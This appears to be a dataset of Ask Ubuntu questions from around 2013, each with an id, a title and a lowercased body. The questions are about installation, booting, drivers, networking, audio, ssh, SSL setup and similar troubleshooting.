0 . thanks in advance !
349126	log commands executed in ubuntu	is there a way to monitor commands that are executed on an ubuntu system ? basically i am looking for something like a key logger but only for commands executed .
349128	ubuntu not loading after instalation	first of all , good day . i recently tried to install ubuntu on my netbook , because windows 7 was running slow . i completely wiped my hard drive , created a bootable usb stick , and installed ubuntu 13.04 on my laptop . whenever i try to boot without my usb stick plugged in , it says something like `` select proper boot device , or insert proper boot device , and press any key '' when i have my usb stick plugged in , it just boots from it . i am pretty much new to actually working with computers , i 've been spoiled by using os x for way to long . i am running an asus eeepc seashell ( 1015pe ) , with a dualcore amd 1.65ghz and 4 gigs of ram . any support will be greatly appreciated .
349129	12.04 lts wo n't boot after nvidia driver upgrade	i wanted to use the most recent nvidia-319 ( i think ) drivers so that steam would stop complaining about my drivers . i selected the 319 drivers in the system hardware menu and rebooted . the system hung on reboot for several minutes so i performed a hard-shutdown . after the system came back online , it prompted me for my mysqlserver login ( its never done that before ) . i forgot the credentials so i hard-restarted again and this time it boots to a black screen with a flashing cursor on the top left . nothing that i type is shown on screen . when i hit the power button , it says various things are shutting down/stopping and then the system turns off . my question is how can i use a livecd to revert this driver change ? or is there another ( better ) method ? this is the first time that i have broken my ubuntu in 4 years : ( thanks in advance .
349133	difficulty dual booting with windows 7	so i 've had kubuntu running on my lenovo laptop as the only operating system for most of the summer . earlier this week , i decided to shrink the home partition in order to add a windows 7 partition . after installing windows 7 , i was then stuck where i could boot into windows 7 , but could not boot into kubuntu . i ended up using a kubuntu live usb in order to use the boot-repair tool , which let me regain access to grub , which now correctly lists kubuntu and windows 7 as the bootable operating systems , but it crashes any time i try to boot into windows . it is able to successfully boot into kubuntu . i ran the windows startup repair tool several times without success , as well as re-running the boot repair tool . below is a link to the boot repair summary from the most recent attempt at boot-repair . http : //paste.ubuntu.com/6146103/ any suggestions as to how i could fix this without just wiping the drives and starting over ?
349134	hard drive is wiped using killdisk ... ubuntu 13.04 wo n't boot from the dvd	i insert the disk , go to bios menu and make sure it is booting from the dvd ... i get message '' please insert bootable media and reboot '' or something to that effect . i have burned many different dvd 's with the same result . any help would be great . there is no os on this hard drive .
349135	terminal download speeds really slow	my download speed in terminal apps ( apt-get , wget ) is very slow . although gui apps such as firefox and chrome work fine . i have no idea why this is . its quite a wierd problem and yes , i 've tried turning it off and on again
349136	delete synced folder in ubuntu one	i 'm trying to delete a folder that 's located in the cloud under synced folders , i have un-synced it from my computer and from my phone . the folder contains a lot of files i do n't need in the cloud , i synced it as a test , to understand how ubuntu one works . but now i ca n't delete it , i click more and there are no available options . any thoughts ?
349137	no sound on a hp pavilion dv6 with ubuntu 12.04	after installation ubuntu 12.04 in my hp pavilion dv6 machine sound system is not working . commands like gksudo gedit /etc/modprobe.d/alsa-base.conf killall pulseaudio sudo alsa force-reload pulseaudio -d sudo alsa force-reload sudo apt-get install -- reinstall libasound2 gksudo gedit /etc/modprobe.d/alsa-base.conf killall pulseaudio sudo alsa force-reload pulseaudio -d gksudo gedit /etc/modprobe.d/alsa-base.conf had tried as revealed from forum 's discussion . inspite of all these its not working .
349144	how do i install the latest version of matlab ?	when i tried to install matlab using the software center , it prompted me for the location of matlab installation ( s ) . since i am trying to install it , i do n't know what to do .
349147	nautilus , gedit etc - remeber windows position	how to force nautilus and gedit ( and practically all program 's windows on ubuntu ) to always remember their window position ? when i start another nautilus window , it is randomly placed on different positions of desktop . i dont wan na that . i work on 16:9 monitor , with one document window on left and nautilus/gedit on right , it really annoys me to reposition every time i start new window or run new instance of nautilus/gedit . i use ubuntu 12.04.3 lts .
349153	installing different os	after i installed ubuntu i tried to install windows back , around 3 weeks after . now every time i try to reinstall windows it says : '' please insert proper boot device '' after uninstalling ubuntu it is still a boot partition in the bios . does anyone know how i could install windows back ? the only reason why i want to do this is because ubuntu ca n't play many games and i am a pc gamer .
349154	supported laptop with touchscreen ?	i 'd like to know whether there exists hardware that satisfies these requirements : working well with a recent ubuntu ( i 'd like 13.10 to work well ) having a touchscreen it looks like we are in an unfortunate situation where no such thing exists yet ... did i miss something ?
349156	how to use hard disk as ram like in windows ?	there is an easy way to use hard disk as ram in windows machines . is there a way to use hard disk as ram in ubuntu ?
349158	installing 13.04 on a 250gb internal , recognized by windows 7 and bios but not ubuntu	i 've tried formatting it , deleting volumes and leaving it unformatted , partitioning , no dice . i 'm a complete newb and this is my first time installing .
349162	how to access to synchronized folders via bittorrent sync ?	good day people ! i installed bittorrent sync by this manual 'how to run bittorrent sync ? ' ( first way ) . after synchronization with my remote computer by bittorrent sync , i got folder with only root access . i restored full access by this script : sudo chmod -r rwx+ugo /path/to/folder but i do not want to do this operation after each synchronization . can you help me please ?
349163	any ubuntu tool to edit tag in mp3 files in group	is there any tool in ubuntu to edit tag information in mp3 files in group ? for example , i want to set all the files in a directory with the same album name or artists . how can i do that ? i find 'easytag ' , but i need to do that 1 file at a time . i want to know if there is something i can do 1 directory/1 directory tree at the same time ? thank you .
349164	is it possible to rotate a video using avidemux command line ?	i have a number of video files ( mov ) which i only need to rotate 90째 clockwise . as it may be needed in the future as well , i first tried using ffmpeg and then mencoder command line in a nautilus script but unfortunately i was n't satisfied with the reduced quality of output video . avidemux gtk has produced the output video in the same quality as the input video . but i would ideally like to use it from command line , i.e . avidemux2_cli , although i could n't find any info about the use video filters like rotate in the documentation .
349165	can not receive e-mail when not logged in on ubuntu server	recently i tried to set up an e-mail and web server with ubuntu server ( postfix-dovecot and apache2 ) . when i 'm logged in to my user account i can send and receive e-mails either internally and from internet . but when i 'm not logged in , the emails sent from outside get bounced back to the sender with the following notification : this is the mail system at host `` domain '' . i 'm sorry to have to inform you that your message could not be delivered to one or more recipients . it 's attached below . for further assistance , please send mail to postmaster . if you do so , please include this problem report . you can delete your own text from the attached returned message . the mail system user @ domain : maildir delivery failed : create maildir file /home/user/maildir/tmp/137969483152.p454754.domain : permission denied am i missing something here ? please bear in mind that i 'm new to linux/ubuntu . thank you very much guys
349166	unable to install ubuntu 13.04 ( using cd ) alongside windows 7	while installing ubuntu 13.04 along with windows7 , i did n't get any option like `` alongside windows7 '' , then i went for the last option `` something else '' , there i did n't find any partitions , it is just showing free space sda 750gb. , help me out of this problem . what 's going wrong , previously i had use the ubuntu 12.04 with win7 . machine details : asus k55 vj intel core i5 3gen,8gb ram , 750gb c:75gb , d:199gb , e:398gb allocated by me , there is an 25gb unallocated space available
349167	ptrace ( attach ) failing while attaching a thread from another thread ( of same process )	1 # include < stdio.h > 2 # include < pthread.h > 3 # include < sys/ptrace.h > 4 # include < sys/types.h > 5 # include < sys/wait.h > 6 # include < unistd.h > 7 # include < sys/signal.h > 8 # include < syscall.h > 9 # include < unistd.h > 10 # include < sys/user.h > 11 # include < stddef.h > 12 # include < errno.h > 13 14 void *thread_func_one ( void * ) ; 15 void* thread_func_tracer ( void * ) ; 16 17 int g_ivar_one = 0 ; 18 19 typedef struct { 20 pid_t childprocess ; 21 pid_t child_tid1 ; 22 } parent_action_args ; 23 24 parent_action_args parent_arg_params = { 0 } ; 25 26 int main ( int argc , char* argv [ ] ) 27 { 28 pthread_t threadone , thread_tracer ; 29 int iret = -1 , iret2 = -1 ; 30 31 iret = pthread_create ( & threadone , null , thread_func_one , null ) ; 32 sleep ( 1 ) ; 33 iret2 = pthread_create ( & thread_tracer , null , thread_func_tracer , null ) ; 34 35 pthread_join ( threadone , null ) ; 36 pthread_join ( thread_tracer , null ) ; 37 38 return 0 ; 39 } 40 41 void *thread_func_one ( void *pparam ) 42 { 43 int iflag = 0 ; 44 parent_arg_params.childprocess = syscall ( sys_gettid ) ; 45 printf ( `` < tid > = % d\n '' , parent_arg_params.childprocess ) ; 46 while ( 10 > iflag ) 47 { 48 g_ivar_one++ ; 49 iflag++ ; 50 printf ( `` g_ivar_one = % d\n '' , iflag ) ; 51 sleep ( 1 ) ; 52 } 53 54 } 55 56 void *thread_func_tracer ( void *pparam ) 57 { 58 prctl ( pr_set_ptracer , parent_arg_params.childprocess ) ; 62 printf ( `` thread_func_tracer < tid > = % d\n '' , parent_arg_params.childprocess ) ; 59 printf ( `` thread_func_tracer < tid > = % d\n '' , parent_arg_params.childprocess ) ; 60 if ( ptrace ( ptrace_attach , parent_arg_params.childprocess , null , null ) ) 61 { 62 printf ( `` mkh _ attach-fail err = % d\n '' , errno ) ; 63 } 64 wait ( null ) ; 65 } can anyone tell me where i am wrong ? i made `` 22 kernel.yama.ptrace_scope =0 '' .
349169	right-click not working on 12.04 [ acer travelmate ]	for the past 2 hours , the right click button on my laptop ( acer travelmate ) is not working . upon using it , nothing happens , no menu pops up ( as it normally should ) , it remains static as if no command was registered . any ideas on how this can sorted ?
349171	how to install class bench using make all and bashrc	class bench is program for linux , classbench duty is create packets and generate some rules which they call them filter set.in class bench there is three folder : trace_generator db_generator parameter_files note : trace_generator 's duty is to generate packets , db_generate 's duty is create filter set , paremeter_files is like library . ok , know how to install db_gerater and trace_generator ? simple ! just go to their path and write `` make all '' .know if you want to run db_generater you should just type this command db_generator -bc acl3_seed 10000 2 0.5 -0.1 mynewfilters10k but when i write that i saw linux terminal does not support this i search and find i have to add this to my bashrc also i typed ! /.bashrc but now i do not know what i should add here . before that i installed ns2 which is network simulator i wrote something about ns2 in there but now for classbench i do not know what i should add here ? by the way acl3_seed in the parameter_files
349173	update and upgrade updated mysql and now `` job failed to start ''	i ran apt-get update and apt-get upgrade earlier today and i had a conflict with the my.cnf file i saw default=n so i pressed `` n '' and went on my merry way . i now ca n't start mysql via service mysql start , i 'm getting : start : job failed to start i 'm assuming i updated mysql and it 's using an old cnf file . is this possible ?
349177	latex in ubuntu	there is no internet connection in my laptop . however net is in my office desktop & i have usb . i want to install latex in my laptop . is it possible ? my version is ubuntu 12.04
349178	ubuntu 13.04 wifi is connected but does n't work after a while	i run ubuntu server 13.04 with kernel 3.8.0 . my wireless card is `` intel corporation centrino advanced-n 6205 '' . the loaded module for this card is iwlwifi . in the past i simply used the /etc/network/interfaces and wpa_supplicant combo . then the problems began . i 'm connected to my access point but after a short while network communication does n't work , i even ca n't ping anything . then i switched to network manager but it did n't helped anything . this problem only appears at my home network . i have a d-link wireless router . and i did n't had the problems when i started to use ubuntu . they appeared at some point but i ca n't remember whether their was any special event before it began . any hints ?
349185	compiling realtek wifi card driver fails	to get my wifi card realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) working properly , i downloaded the unix driver source from realtek 's website . while trying to compile the driver using make , i get the following error message : make -c /lib/modules/3.8.0-30-generic/build m=/home/sebastian/downloads/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 modules make [ 1 ] : betrete verzeichnis '/usr/src/linux-headers-3.8.0-30-generic' cc [ m ] /home/sebastian/downloads/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/base.o in file included from /home/sebastian/downloads/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/base.c:39:0 : /home/sebastian/downloads/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/pci.h:247:15 : fehler : expected »=« , » , « , » ; « , »asm« or »__attribute__« before »rtl_pci_probe« make [ 2 ] : *** [ /home/sebastian/downloads/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/base.o ] fehler 1 make [ 1 ] : *** [ _module_/home/sebastian/downloads/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 ] fehler 2 make [ 1 ] : verlasse verzeichnis '/usr/src/linux-headers-3.8.0-30-generic' make : *** [ all ] fehler 2 sorry it 's german ... `` fehler '' = `` error '' , `` verlasse verzeichnis '' = `` leaving directory '' installing the correct driver of my ethernet card did n't resolve in any problems , because the driver was already compiled . now my ethernet card works ~10 times faster and i want to improve my wifi also ... what exactly is the error and how do i solve it ? edit : i 'm using raring x64
349196	please help to switch to ubuntu full-time !	my window positions and sizes are never saved . when i open programs like : chromium , code blocks , xchat , thunderbird , skype and others . set them in a correct location on one of my screens ( i have 2x24 ' monitors ) , but when i close and open any of the apps again , apps will appear in a default location , with default size . program that i use the most : code blocks . i set up window locations inside of it , set it up as i like , but when i re-run it - everything is reset to default : image : my window setup in code blocks image : resets to a default size , position and view and this happens to all of the apps . please advise how this can be dealt with .
349199	last step installing ubuntu in vmware takes long time	i 'm installing ubuntu 12.04 on vmware in my win7 32 big system . so far the last step `` reticulating splines '' has been going on for more than 20 minutes , and it looks normal without error pops out . is something wrong or do i just have to wait ? thanks !
349201	turn off nfc in saucy/raring	i am having a `` sony vaio pro 13 '' with integrated nfc chip . unfortunately i can not turn nfc off in the bios . i want now to turn it off in ubuntu for saving power and extend battery life . when i place my smartphone on the clickpad it makes a short noise that it found another nfc device . powertop reports that nfc uses up to 110mw ( which i can save ) . currently the vaio is using only 5.5 - 6.0 w per hour which i think is very good but as i do not need nfc is could be better .
349204	menu bar is no more visible in vlc	vlc was working fine until this happened : the menu bar is no more visible . i do n't remember making any configuration changes , though i have tried to revert them , if any with the help of this question : no menu option in vlc attaching a screenshot of the problem i am talking about : the menu bar is visible from all other applications i use regularly . also , i am able to access the menu options using alt + m/h/a/v , but this is very inconvenient . how do i make it visible again ? specifications : ubuntu 12.10 vlc media player 2.0.8 twoflower
349206	ubuntu 13.04 install gone wrong : no gui in ubuntu and can not boot into windows 8	i tried to install ubuntu 13.04 alongside windows 8 . i had shrunk the windows partition 21 gbs , and did not format it . then , i disabled fast boot and secure boot from the bios , and made the uefi : sandisk with the 13.04 copied with universal usb installer , the first priority for boot . when ubuntu installer loaded , i chose install ubuntu , and then chose install alongside ubuntu . when it restarted , grub showed up with no problem , but when i try to load ubuntu , i get no gui . i tried startx , but it told me no screens found . when i try to boot into windows 8 , by choosing it from grub loader , it gives me the following errors : error : ca n't find command `` drivemap '' error : invalid efi filepath but , when i go to the bios , the boot options have changed to include ubuntu , and also the already existing windows boot manager . i choose windows boot manager again , which , upon restart , bypasses grub , and loads directly into windows 8 . i am not sure whether these are two separate problems so i wrote them both in a single question . the laptop i use is samsung ativ book 9 , with 128 gb ssd .
349207	ibus responding slow	i 'm using ubuntu 12.04 and have both the japanese and chinese with ibus . however , when clicking on a different language , it takes quite a long time to change to another language , even though the small dot changes towards the selected language ( the input method itself does n't ) . is this a bug ? also , can i put shortcuts on the language changes , like when changing the keyboard layout ?
349210	i have a .sh that is `` self extracting '' but removes folders upon completion	i need the folders to stick around and ca n't find a way to stop the script from removing them . it 's supposed to install software , but is designed for redhat and i want to compile and run the files manually within ubuntu . is there anyway to step through a bash script or extract an archive from a self install .sh file ? thanks ! the package in question is : http : //irsa.ipac.caltech.edu/data/spitzer/docs/dataanalysistools/tools/spice/downloadspice/ ( the linux .sh )
349211	sorting pictures by name-column `` record date '' with nautilus	i use ubuntu 12.04 lts a few days now and i like to shot photos : - ) . so far , i load all my pictures on my ubuntu system ( approximatly 15000 ) . but when i want to sort them in their folders by the record-date i dont find an option to do this . i came from windows and in the explorer it wasn a big thing . so my question is , if anyone out there know an extension for nautilus or a easy way to sort my pictures to view . i tried `` shotwell '' but it takes very long time to import 15000 photos , so i aborted the import process . maybe you can help me . this would be great . thank you ...
349216	will ubuntu touch be avalible for all android phones ? what version will i need for installation ?	will ubuntu touch be available to be used on any android phone such as my lg g2x p999 or is it just nexes and samsung ? also what version of ubuntu will i need for installation ? i know that the full version of ubuntu touch will be out in october , and if by that time if you will have anything available for the newer version of my phone , the lg g2 ?
349219	mount windows 7 partition from usb live . ubuntu not installed yet	i 've opened terminal and type following commands : # sudo mkdir -p /media/c # sudo fdisk -1 nothing happens when i press enter . let me back up a little . i am able to install ubuntu 12.04 on my machine , but while going through installation , it says i have multiple operating systems . which i do n't , but perhaps one of the 3 partitions looks like a seperate o.s . therefore i 'm trying to see what specifically is on the 1.46 gb partition ( boot . diag ) as well as the 13.75 partition ( hdd recovery ) and decide if i should delete one of them , or just move forward with install . i have full windows 7 os on a usb , so i probably do n't `` really '' need recovery . the problem is windows labels the 1.46 partiton as recovery , while ubuntu labels the 13.75 as recovery ... . so i 'm confused .
349220	is there any way to retain word 2010 format ?	i have some resumes and other documents that are really format dependent . they were originally created with microsoft word 2010 , and is there any way to put them into ubuntu and have them still be editable ( not in pdf form . ) when i tried opening them in libreoffice they opened fine , but the format was all messed up .
349221	porting a compiz plugin	i 'm trying to port a compiz plugin from an older version to 0.9x i 'm absolutely new to developing compiz plugins and so not really sure where to begin . i 've looked at some simple compiz plugins on github , read the 'how to develop a compiz plugin ' but i 'm unable to find any information on how to port older compiz plugins . absolutely any links/instructions would be of great help . thanks
349222	chromium browser loads flash only as root user	i 'm running ubuntu on a chromebook , and am having trouble with pepper flash . i can run chromium-browser with sudo chromium-browser -- user-data-dir=/tmp/ -- ppapi=/opt/google/chrome/pepper/libpepflashplayer.so and flash video works perfectly . however , as a normal user , it loads the plugin ( by checking the chromium : //plugins page ) , but does n't play flash video . i checked to see if normal users had permissions to read the plugin directory , and they seem fine ( 644 permissions ) quicktime and html5 videos work without too much trouble .
349224	how do i copy a file to the desktop ?	i 'm trying to use the dd command to make myself a boot-able ubuntu 13.04 so i can reload the system but the iso i have is stored on a external hard drive.. like a data disk . anyway , i open the hard drive , i right click the iso and select `` copy to '' and select desktop and it loads for a minute then i get this box before it finishes : error while copying `` ubuntu-13.04-desktop-amd64.iso '' . there was an error copying the file into /home/ubuntu/desktop . error splicing file : input/output error i get this problem when i use ubuntu 13.04 to get a large file off of a disk and onto the system itself is this a bug with ubuntu or is there a another way i can copy large files to the desktop ?
349226	graphical session does not start ( ubuntu 12.04 + nvidia ) [ solved ]	[ solved : ubuntu 12.04 lts - black screen at boot after changing nvidia driver ] i updated the nvidia graphics driver ( `` current '' to `` post-release updates '' ) , but the x server does not start . check out the video : http : //youtu.be/s8eqjnufpwk the message : '' the nvidia kernel module has version 304.88 , but this nvidia driver component has version 319.32 . que please make sure the kernel module and all nvidia driver components have same-version . '' what to do ? informations : amd athlon ii x3 400e . 4gb ram . nvidia geforce gtx 550ti 1gb . ubuntu 12.04.3 lts nvidia driver 319.32 ( post-release updates ) .
349228	installing multiple operating systems onto a flash drive	i am trying to install centos onto another one of my machines , and i am new to ubuntu . when i downloaded centos the operating system came as two .iso images . so far i have been unable to figure out how to mount the two images onto a single 32gb flash drive to do a full install on the os . i also want to have ubuntu on the same flash drive . so when i boot my computer , and boot to the flash drive i can select whether i want to install centos or boot ubuntu . i 'm using ubuntu 12.04 lts . here is a link to the centos file i 'm using http : //mirror.stanford.edu/yum/pub/centos/6.4/isos/x86_64/centos-6.4-x86_64-bin-dvd1to2.torrent
349229	how do i detect if i 'm in a 'full screen ' bash shell or gui terminal window ?	i have some code in my .bashrc that sets the terminal window title using the currently running command and it works great in unity , where the terminal is in a window . however , when i 'm logging in with the ctrl + alt + f1 terminal ( whatever it 's called ) , my prompt gets filled with garbage that is various escape sequences that set the ( nonexistent ) window title . how can i detect from within a bash script if i 'm in one or the other ?
349233	installed ubuntu 12.10 will not access hd , extreemly slow , keyboard not working properly or mouse	i 've just loaded ubuntu onto my laptop , it had windows xp or 7 before.. it stopped working so i decided to re-install the os and i went for ubuntu to give linux a go and maybe learn about programming etc . i have installed on the laptop stated the computer up works fine when asking me for the encryption password.. as soon as i 'm on the desktop its very slow.. i.e . 3 minuets to open the home folder.. when i type letters do n't appear and if they do its in a white box in the bottom right hand corner and not in the terminal or box.. the mouse only works with the bar on the left , it will not interact with any of the boxes opened in the desktop i have to left click on the bar and click quite to close the box.. i have tried to update the os , but nothing happens.. when i go to computer the hd says unable to mount location & ca n't mount file.. please , please can someone tell me what is going on ? ? i 'm so confused , i now linux is a bit harder to use than windows but this is unbelievable is there some sort of `` access code '' i have to enter to give me control of the desktop ? laptop specification as read from about computer : 3.9 gb memory ram dual core t4400 2.2ghz x2 os type 32bit disk - 488 gb ? - if it ca n't mount how does it know this ?
349236	pc restarts after a few seconds when performing shutdown or suspend	after a shutdown or suspend , the machine appears to completely shutdown ( all fans stop and are quiet ) , after a few seconds , everything is powered up again by itself . despite the many offered solutions here in the forum , my pc keeps on rebooting after shutdown and after suspend . important update : it appears that the pc shuts down without restart when zfs is performing a scrub . i assume this means that something is going wrong when the pc is shutting down with regards to zfs ( unmount ? unshare ? ) . any clues ? i tried adding acpi=noirq to the grub file , after that i executed update-grub . i tried adding acpi=no apm=no instead , but that caused suspend to not terminate properly and result in a reboot . shutdown causes reboot like before . tried sudo halt , sudo shutdown -h now tried installing laptop-mode-tools in ubuntu 12.10 de-activated wol i even tried to change `` auto '' to `` on '' in the `` control '' files for every device . upgraded to ubuntu 13.04 ( i believe laptop-mode-tools are not available under 13.04 ? ) tried messing in the bios acpi settings ( switched everything off , with no result ) none of it seems to work , and i 'm getting out of info on the forum ... questions : is there anybody that has an idea what could go wrong ? could zfs be the cause ? or the fact that i have an additional pci-e network adapter ? ( some wol issue ) i 'm not too familiar with ubuntu , how can i access/dump the logtext when the system is going to shutdown or suspend ( not the arrow key , but a file ) ? running ubuntu 13.04 now , with zfs ( 6 disks ) as a nas on a asrock b75 pro3-m , intel pentium g2020 , 16 gb ram , additional pci-e network adapter .
349238	how can i clear my cached gpg password ?	i 've tried : the sighup method -- > no succes the cache timeout in gpg-agent.conf -- > it seems that this file is not read , althougt i have the 'use-agent ' line in gpg.conf what should i do ?
349242	how to load fonts and how to set their resolution in ubuntu 12.04 ?	according to how can i make fonts look like they do in windows ? i have got the resolution 96x96 dots per inch , but i do not see any possibility to set it in the system settings ; searching for 'font ' finds only the 'univesal access ' with no possibility of setting the resolution or loading any further fonts , maybe the true type ones . according to how do i change the font dpi settings ? answer i have installed the gnome-tweak-tool 3.3.4-0ubuntu . it also does not appear to enable setting the resolution nor loading more fonts .
349243	selecting any of the uefi entries in grub keeps me booting windows 7 , what to do ?	little problem with a newbie here , after a bunch of reinstalling , i 've managed to make 7 + 8 + ubuntu not crash on my new t430 . 8 ( pre ) installed first , then 7 , then ubuntu ( bootloader installed onto the root partition , not mbr i 'm guessing ? ) , then boot-repaired from a live cd grub works , huzzah ! problem is , booting to windows comes in two options : windows uefi bkpbootmgfw.efi windows boot uefi loader both of which send to me to the windows 7 bootloader , which then gives me the choice to boot 7 or 8 . any way i can boot to both of them directly from grub ? update : i tried to use easybcd to re-default the windows bootloader , but it somehow managed to screw things up when `` reset '' ing , and i ended up with 60 boot items . windows would not boot at all afterwards . i have now completely reinstalled everything , so ubuntu and windows both have their own boots which i can select as devices by pressing f12 , and i can adjust the default as well . however , i would still like to have all 3 options available from start up . i tried using easybcd to add ubuntu to the windows bootloader , but it says that it 's missing the /nst/autoneogrud2.mbr file and wo n't boot from there .
349244	how can i transfer files from my computer to my acer phone ?	i use xubuntu on my computer and my phone is an acer liquid gallant duo ( e350 ) . my problem is that i ca n't seem to transfer files ( music ) from my computer to my phone : when i use ptp all the files and folders on my sd card seem to be invisible and it is impossible to create new ones , and using mtp only the picture files appear ( obviously ) . i used to use airdroid ( a file sharing system for android ) but the system was recently changed so that i have to pay to transfer anything more than 100mb worth of files , thus making this software useless to me ( i have no means of buying it online ) . i have tried some different cloud software but they all seem to only be compatible with windows or mac ... . would anyone be so kind as to give me some advice ? the best , of course , would be a fix for the initial problem but i 'm open to any help ! thanks in advance !
349245	ubuntu 12.04 wo n't start after boot menu , but gives startup sound	as said , i installed ubuntu 12.04 in dual boot with my previous windows vista on my laptop . i run the boot repair , and did recommended repair . i can get into windows , but not ubuntu . although i can select it on boot menu , then it gives me a black screen , and does n't pass from this . however , i can hear the sound of the ubuntu startup , but i get no image , only black sugestions ? this is the output : '' boot successfully repaired . please write on a paper the following url : http : //paste.ubuntu.com/6147436/ in case you still experience boot problem , indicate this url to : boot.repair @ gmail.com or to your favorite support forum . you can now reboot your computer . ''
349247	only show launcher on specific workspace ?	is it possible to only show the launcher on a specific workspace ? i would like the launcher for my top left workspace , but none of the others . i seem to remember seeing an option or setting for this , but now i ca n't find it now that i need it .
349252	skype causes audio/video playback to speed up ?	recently i had a problem with audio and video playback speeds . the night before the issue everything played fine ( on vlc , youtube , etc. ) . the day after , the audio and video playback speeds were increased to where the audio sounds like high-pitched cartoon characters . in response , i reinstalled pulseaudio hoping to solve the issue . however , today i was watching a youtube video and received a message on skype . after receiving the message , the audio and video playbacks increased in speed instantly to the previously mentioned state . is this an issue with skype or possibly pulseaudio ? does anyone happen to know any solutions to this issue ? thank you
349258	control volume via headphones volume control	anyone know if it is possible in ubuntu to control the system volume with the volume control on your headphones ? using bose qc 15 if that makes any difference ?
349259	enable/disable serial devices ( com 's ) for multiple vm instances via command line	i have a host computer ( ubuntu 12.04 ) running kvm ( qemu ) which has anywhere from 1 to 10 vm 's using windows xp , windows 7 , debian , ubuntu etc.. from the host machine i need a way to bind serial coms on these guests at runtime and ( if needed ) reboot them . i found a hack way to do this where i can dump the vm .xml config file and add this ( using python ) : < serial type='dev ' > < source path='/dev/ttys1.vm2'/ > < target port='1'/ > < /serial > and then reload it to and reboot , but i seriously think that this method is n't going to be scalable and error prone . wondering if there is a terminal command such as : virsh instance1 -- uart /dev/ttys1.vm2 1
349260	will a ubuntu livecd be affected by a bios virus ?	if i boot from ubuntu dvd i notice that there are two options : run from dvd without installing it . install ubuntu . my question is , if the pc has a bios virus and the first option is chosen — will the ubuntu ( loaded into the ram , i guess ) be affected or would it be totally “safe and clean” ?
349262	run a nohup command over ssh , then disconnect	i want to execute a script , start.sh on a remote server which runs this : nohup node server.js & naively , i call ssh like this : ssh myserver < < eof ./start.sh & eof this starts the script , but leaves the session connected . i want to follow this step with other commands in a script , so that 's no good . how can i ssh to the remote machine , launch a nohup command into the background , then disconnect ? i suppose i could put the ssh process itself into the background , but that does n't seem right .
349264	linux kernel did n't start correctly after boot	after my first kompilation of linux-kernel ( release 3.11 ) i copy kernel to /boot folder and then run grub-mkconfig -o /boot/grub/grub.cfg because my system is using grub . then i saw my kernel in grub menu like `` linux-kernel 3.11 '' but while booting kernel i gave message : gave up waiting for root device . common problems : -boot args ( cat /proc/cmdline ) -check rootdelay= ( did the system wait long enough ? ) -check root= ( did the system wait for the right device ? ) -missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/3026586a-c06a-4ae3-8deb-381252d74515 does not exist . dropping to shell ! busybox v1.20.2 ( ubuntu 1:1.20.0-8ubuntu1 ) build-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) : and i do n't know why my system is did n't load kernel corectly . i 'm totally new in linux-kernel and i 'm not familiar with this . i add to my kernel configuration each option for netfilter . i have in my .config option config_ext4_fs=y and in grub.cfg option set root='hd0 , msdos1' the same like in other out of the box kernels that works correctly
349265	gaming mouse recommendations	i 'm looking to upgrade to a gaming mouse . searching amazon for a linux gaming mouse is n't getting very many results . so i 'm asking here for recommendations . i 'm using ubuntu 13.04 64bit gnome fallback session for now . my preferences are for : * wireless . * ps2 or usb receiver . * at least 6 assignable buttons . * assignable macros would be a bonus . * works out of the box with linux , or at least with a simple setup . * accurate and dependable . * comfortable , as in a low profile design . feel free to share your own experiences or recommendations for gaming mice , joypads , or gamepads that work with linux .
349266	can i download this software on ubuntu or is it not compatible	i need to download this secunia psi 3.0 software inspector on my computer but my only working operating system is ubuntu 12.10 . is it possible for me to download this on ubuntu . i 'm really new to ubuntu so i am sorry if this is a very dumb question .
349269	how to easily remove installed software ?	i would like to know if there is an easy way to remove any installed software . i do know that sudo apt-get remove < package-name > command , but what happens when you do n't know the package name . let 's say you install form a .deb file and you do n't know what the package name is ? it would be great if there was an universal un-installer , like the one in the ubuntu software center , but for all packages .
349270	setting up commerical ssl certification for ubuntu	i 'm trying to setup a ssl certificate to be used on a test server . however , i will be having clients connecting . i went ahead and have paid for the ssl on our domain host . however they require a 2048 encryption . when i enter this command openssl req -new -days 365 -nodes rsa:2048 -keyout stage.mytestserver.com.key -out stage.mytestserver.csr i get an error . unknown option at rsa:2048 ? any suggestions ?
349274	failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/release ubuntu 13.04	i have some errors while run sudo apt-get update . how do i solve this ? thank you . w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //extras.ubuntu.com raring release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/release w : some index files failed to download . they have been ignored , or old ones used instead .
349276	ubuntu is very , very , very slow	i have installed ubuntu and it is extremely slow . typing this text now is extremely frustrating since every 4 - 3 words i type the computer freezes . i have a 3.2 ghz processor and 8 gb ram . my graphics card is : 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati barts pro [ ati radeon hd 6800 series ] [ 1002:6739 ] subsystem : giga-byte technology device [ 1458:21f8 ] . i 'm not running heavy programs on the computer .
349279	12.04 need to restore /boot folder on usb	i recently delate the boot folder on ubuntu 12.04 . the ubuntu is installed on a san disk 16g . when i start it just appeared a black window of grub . all i know is that on the boot folder it was an another folder called grub and 4 kind of files that had the name like `` initrd3.5.0.31 '' whith other four . when i started whith my usb it appeard me that one , and another ( that where the images of the computer and another images o the usb ) i just need a boot folder or the instructions to install them on my usb thanks
349280	will ubuntu work with razr i ( motorola xt890 ) ?	i have a motorola xt890 ( razr i ) , but i have n't found my mobile at the launching list of devices that will work with . i 'm very sad because of that , but i yet have hope . my best regards . gustavo batassa
